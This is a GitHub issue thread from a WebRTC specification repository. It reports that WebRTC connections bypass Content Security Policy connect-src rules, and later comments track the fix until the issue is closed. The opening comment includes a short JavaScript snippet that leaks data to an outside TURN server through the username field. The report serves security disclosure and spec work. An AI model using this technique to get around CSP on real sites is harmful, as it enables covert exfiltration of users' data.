Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

WebRTC bypass CSP connect-src policies #35

Closed
murillo128 opened this issue Jan 9, 2018 · 4 comments

Comments

@murillo128
Copy link

commented Jan 9, 2018

As explained in here: w3c/webappsec-csp#92 WebRTC bypass the CSP security policies for connect-src and a malicious script could use webrtc to leak data to a rogue server.

Note that it is not even needed to use datachannels at all, as you could leak data (at low rate) to a specially crafted TURN server on the username:

var pc = new RTCPeerConnection({"iceServers":[{"urls":["turn:74.125.140.127:19305?transport=udp"],"username":"_all_your_data_belongs_to_us","credential":"."}]});
pc.createOffer().then((sdp)=>pc.setLocalDescription(sdp);

IMHO this should be covered at the CSP spec, but we should add a warning at the security and privacy section of the webrtc spec until this is solved.

@alvestrand

This comment has been minimized.

Copy link

commented Jan 18, 2018

Pull request on CSP spec: w3c/webappsec-csp#287

@alvestrand alvestrand self-assigned this Jan 18, 2018
@henbos

This comment has been minimized.

Copy link

commented Aug 22, 2018

What's the status here?

@alvestrand

This comment has been minimized.

Copy link

commented Jul 4, 2019

Since this is a new feature, and we've stopped adding new features, I'm moving this to the NV repo.

@alvestrand alvestrand transferred this issue from w3c/webrtc-pc Jul 4, 2019
aboba added a commit that referenced this issue Jul 15, 2019
Fix for Issues #35 and #36.
@aboba aboba added the PR exists label Jul 15, 2019
@aboba

This comment has been minimized.

Copy link
Collaborator

commented Aug 27, 2019

With merger of PR 38, closing this issue.

@aboba aboba closed this Aug 27, 2019
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Projects
None yet
4 participants
You can’t perform that action at this time.